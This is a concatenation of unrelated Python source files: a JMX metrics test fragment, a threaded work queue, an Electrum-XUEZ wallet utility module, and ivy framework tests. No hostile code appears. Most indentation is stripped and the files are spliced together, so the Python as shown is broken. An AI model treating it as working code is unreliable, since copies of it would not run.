self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__))
self.jmx_daemon = JMXFetch(confd_path, {'sdstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
log.info([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']])
log.info(metrics)
log.info(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "instance:cassandra_instance" in t['tags']]))
log.info(len([t for t in metrics if "cassandra." in t['metric']]))
log.info(len(metrics))
self.assertTrue(len([t for t in metrics if "cassandra." in t['metric'] and "instance:cassandra_instance" in t['tags']]) > 40, metrics)
|
thread_worker_queue.py
|
import copy
import threading
import queue
class SingleTaskListener():
def __init__(self):
self.ev = threading.Event()
def wait(self):
self.ev.wait()
def notify(self, _id, _data):
self.ev.set()
class MultipleTaskListener():
def __init__(self, count):
self.count = 0
self.expected = count
self.ev = threading.Event()
def wait(self):
self.ev.wait()
def notify(self, _id, _data):
self.count += 1
if self.count == self.expected:
self.ev.set()
class TaskFuture():
def __init__(self):
self.data = None
def notify(self, _id, _data):
if(_data != None):
self.data = copy.deepcopy(_data)
class ThreadedWorkQueue(object):
def __init__(self):
self.queue = queue.Queue()
self.thread_handle = None
self.work_lock = threading.Lock()
self.tasks = {}
self.payload = {}
self.context_id = None
self.context_copy = None
self.listeners = None
def start(self):
self.work_lock.acquire()
        self.thread_handle = threading.Thread(target=self.thread_run_loop, daemon=True)
self.thread_handle.start()
self.work_lock.release()
def _stop_active_task(self, _id):
pass
def stop(self):
self.work_lock.acquire()
if self.thread_handle == None:
self.work_lock.release()
return
#flush queue
_tasks = self.tasks
_payload = self.payload
self.tasks = {}
self.payload = {}
self.queue.put(None)
if self.context_id != None:
self.tasks[self.context_id] = _tasks[self.context_id]
self.payload[self.context_id] = _payload[self.context_id]
del _tasks[self.context_id]
del _payload[self.context_id]
self._stop_active_task(self.context_id)
for i,v in _tasks.items():
self._task_removed(i, copy.deepcopy(v), _payload[i])
self.work_lock.release()
self.thread_handle.join()
self.thread_handle = None
#discard a queued item, item must not be started, if it's started then discard will fail
def remove(self, _id):
self.work_lock.acquire()
if _id != self.context_id:
self._try_remove_task(_id)
self.work_lock.release()
def _task_removed(self, _id, _data, _payload):
pass
def _try_remove_task(self, _id):
data = self.tasks.get(_id,None)
if data != None:
_p = self.payload[_id]
del self.tasks[_id]
del self.payload[_id]
self._task_removed(_id, copy.deepcopy(data), _p)
#add item to queue
def add(self, _id, _item_dict, _payload):
self.work_lock.acquire()
if self.tasks == None or _id in self.tasks:
self.work_lock.release()
return False
self.tasks[_id] = _item_dict
self.payload[_id] = _payload
self.work_lock.release()
self.queue.put(_id)
return True
def query_items(self):
self.work_lock.acquire()
result = copy.deepcopy(self.tasks)
if self.context_copy != None:
result[self.context_id] = copy.deepcopy(self.context_copy)
self.work_lock.release()
return result
def query_status(self):
status = None
tasks = None
active = None
self.work_lock.acquire()
if (self.thread_handle != None):
status = "active"
else:
status = "inactive"
tasks = copy.deepcopy(self.tasks)
if self.context_copy != None:
active = copy.deepcopy(self.context_copy)
self.work_lock.release()
return {
"status" : status,
"queue" : tasks,
"active" : active
}
def is_active(self):
self.work_lock.acquire()
if self.thread_handle == None:
self.work_lock.release()
return False
result = len(self.tasks)
self.work_lock.release()
if result > 0:
return True
return False
def wait(self):
self.work_lock.acquire()
sz = len(self.tasks)
if sz > 0:
ev = threading.Event()
func = lambda: ev.set()
if self.listeners == None:
self.listeners = [func]
else:
self.listeners.append(func)
self.work_lock.release()
ev.wait()
            return
self.work_lock.release()
def prepare_task(self, _id, _itm):
return copy.deepcopy(_itm), self.payload.get(_id, None)
def execute_active_task(self, _id, _payload):
pass
def task_finished(self, _id, _task_copy, _payload):
del self.tasks[_id]
del self.payload[_id]
if len(self.tasks) == 0 and self.listeners != None:
l = self.listeners
self.listeners = None
for func in l:
func()
def acquire_active_context(self):
self.work_lock.acquire()
return self.context_copy
def release_active_context(self, _ctx):
self.work_lock.release()
def thread_run_loop(self):
while True:
_id = self.queue.get()
if _id == None:
break
self.work_lock.acquire()
_item = self.tasks.get(_id,None)
if _item != None:
_work_item_copy, _exec_payload = self.prepare_task(_id, _item)
self.context_id = _id
self.context_copy = _work_item_copy
self.work_lock.release()
self.execute_active_task(_id, _exec_payload)
self.work_lock.acquire()
self.context_id = None
self.context_copy = None
self.task_finished(_id, _work_item_copy, _exec_payload)
#else: item could be removed before it was processed
self.work_lock.release()
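# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). ThreadedWorkQueue is
# meant to be subclassed: execute_active_task() above is a no-op hook. The
# subclass and payload below are illustrative only.
class _EchoWorkQueue(ThreadedWorkQueue):
    def execute_active_task(self, _id, _payload):
        # _payload is whatever was handed to add(); here it is a callable
        _payload()

if __name__ == '__main__':
    wq = _EchoWorkQueue()
    wq.start()
    wq.add('task-1', {'desc': 'demo task'}, lambda: print('task-1 ran'))
    wq.wait()      # blocks until the queue drains
    wq.stop()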
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
import socket
import ssl
import time
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'XUEZ':8, 'mXUEZ':5, 'uXUEZ':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
        self.parent_thread = threading.current_thread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
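# Hedged example (not part of the original module): the decorator is applied as
#
#   @profiler
#   def load_transactions(path):    # hypothetical function name
#       ...
#
# and prints something like "[profiler] load_transactions 0.1234" to stderr
# when the wrapped function is called.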
def android_headers_file_name():
from bitcoin import TESTNET
s = 'blockchain_headers'
if TESTNET:
s += '_testnet'
return s
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum-xuez.electrum-xuez'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-xuez'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + android_headers_file_name()
old_headers_path = old_electrum_dir + android_headers_file_name()
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
    Cast a string to a bytes-like object; a bytearray input is copied to bytes (kept for Python 2 support).
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-xuez")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-XUEZ")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-XUEZ")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
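# Hedged examples (not part of the original module), assuming a locale whose
# decimal separator is '.':
#
#   format_satoshis(1230000)                -> '0.0123'
#   format_satoshis(1230000, is_diff=True)  -> '+0.0123'
#   format_satoshis(1230000, num_zeros=8)   -> '0.01230000'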
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'xuez.donkeypool.com': ('https://xuez.donkeypool.com',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Xuez.org': ('https://test.insight.xuez.siampm.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'xuez.donkeypool.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Xuez address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'xuez':
raise BaseException("Not a Xuez URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Xuez address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
t.start()
return out
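# Hedged example (not part of the original module): for a syntactically valid
# Xuez address <addr> (placeholder here), and assuming COIN is the usual 10**8
# satoshi-per-coin constant,
#
#   parse_URI('xuez:<addr>?amount=1.5&message=donation')
#
# returns {'address': '<addr>', 'amount': 150000000,
#          'message': 'donation', 'memo': 'donation'}, while a bare address
# string without the 'xuez:' scheme is returned as {'address': <addr>}.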
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='xuez', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
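# Framing sketch: the transport is newline-delimited JSON, so a complete line yields a
# message and any partial tail is handed back for the next call (values illustrative):
# >>> parse_json(b'{"id": 1}\n{"id": 2')
# ({'id': 1}, b'{"id": 2')
# >>> parse_json(b'{"id": 2')
# (None, b'{"id": 2')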
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
        return [utfify(v) for v in arg]
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
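# Conversion sketch for utfify (Python 3 semantics: str values become UTF-8 bytes,
# containers are converted recursively, everything else passes through unchanged):
# >>> utfify({'key': ['a', 1]})
# {b'key': [b'a', 1]}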
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
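# Usage sketch for SocketPipe (host/port are placeholders and the request is only an
# example; the peer is assumed to speak the newline-delimited JSON that parse_json expects):
# >>> s = socket.create_connection(('<host>', 50001))
# >>> pipe = SocketPipe(s)
# >>> pipe.send({'id': 0, 'method': 'server.version', 'params': []})
# >>> pipe.get()  # next decoded message, or raises `timeout` after ~0.1s of silence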
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
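# QueuePipe mirrors the SocketPipe interface but is backed by in-process queues, which
# makes it convenient for tests. A minimal sketch:
# >>> pipe = QueuePipe()
# >>> pipe.send({'id': 1})
# >>> pipe.send_queue.get_nowait()
# {'id': 1}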
def check_www_dir(rdir):
    import urllib.parse, urllib.request, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
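# Usage sketch (the path is a placeholder): check_www_dir('<wallet_dir>/www') creates the
# directory if needed, copies the bundled index.html, and downloads the JS/CSS files above.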
test_general.py
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
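# Shape-inference sketch for the helper above:
# >>> _get_shape_of_list([[1., 2.], [3., 4.], [5., 6.]])
# (3, 2)
# >>> _get_shape_of_list([])
# []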
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
with ivy.functional.backends.numpy.use:
pass
with ivy.functional.backends.jax.use:
pass
with ivy.functional.backends.tensorflow.use:
pass
with ivy.functional.backends.torch.use:
pass
with ivy.functional.backends.mxnet.use:
pass
@pytest.mark.parametrize(
"allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
def func_a(a, b, c=2):
pass
func_b = lambda a, d, e=5: None
class ClassA:
def __init__(self, c, f, g=3):
pass
kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
kwfa, kwfb, kwca = ivy.match_kwargs(kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
if allow_duplicates:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'a': 0, 'd': 3, 'e': 4}
assert kwca == {'c': 2, 'f': 5, 'g': 6}
else:
assert kwfa == {'a': 0, 'b': 1, 'c': 2}
assert kwfb == {'d': 3, 'e': 4}
assert kwca == {'f': 5, 'g': 6}
def test_get_referrers_recursive(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: work out why this test fails in wrapped mode
pytest.skip()
class SomeClass:
def __init__(self):
self.x = [1, 2]
self.y = [self.x]
some_obj = SomeClass()
refs = ivy.get_referrers_recursive(some_obj.x)
ref_keys = refs.keys()
assert len(ref_keys) == 3
assert 'repr' in ref_keys
assert refs['repr'] == '[1,2]'
y_id = str(id(some_obj.y))
y_refs = refs[y_id]
assert y_refs['repr'] == '[[1,2]]'
some_obj_dict_id = str(id(some_obj.__dict__))
assert y_refs[some_obj_dict_id] == 'tracked'
dict_refs = refs[some_obj_dict_id]
assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
some_obj_id = str(id(some_obj))
some_obj_refs = dict_refs[some_obj_id]
assert some_obj_refs['repr'] == str(some_obj).replace(' ', '')
assert len(some_obj_refs) == 1
# array
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"from_numpy", [True, False])
def test_array(object_in, dtype, from_numpy, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# to numpy
if from_numpy:
object_in = np.array(object_in)
# smoke test
ret = ivy.array(object_in, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(call(ivy.array, object_in, dtype, dev), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.array)
# copy array
@pytest.mark.parametrize(
"x", [[0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_copy_array(x, dtype, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
# smoke test
x = ivy.array(x, dtype, dev)
ret = ivy.copy_array(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(x))
assert id(x) != id(ret)
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support string devices
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.copy_array)
# array_equal
@pytest.mark.parametrize(
"x0_n_x1_n_res", [([0.], [0.], True), ([0.], [1.], False),
([[0.], [1.]], [[0.], [1.]], True),
([[0.], [1.]], [[1.], [2.]], False)])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
def test_array_equal(x0_n_x1_n_res, dtype, dev, call):
if call in [helpers.mx_call] and dtype in ['int16', 'bool']:
        # mxnet does not support int16, and does not support bool for the broadcast_equal method used
pytest.skip()
x0, x1, true_res = x0_n_x1_n_res
# smoke test
x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.array_equal)
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_array(x0)
assert ivy.is_array(x1)
assert ivy.is_array(x2)
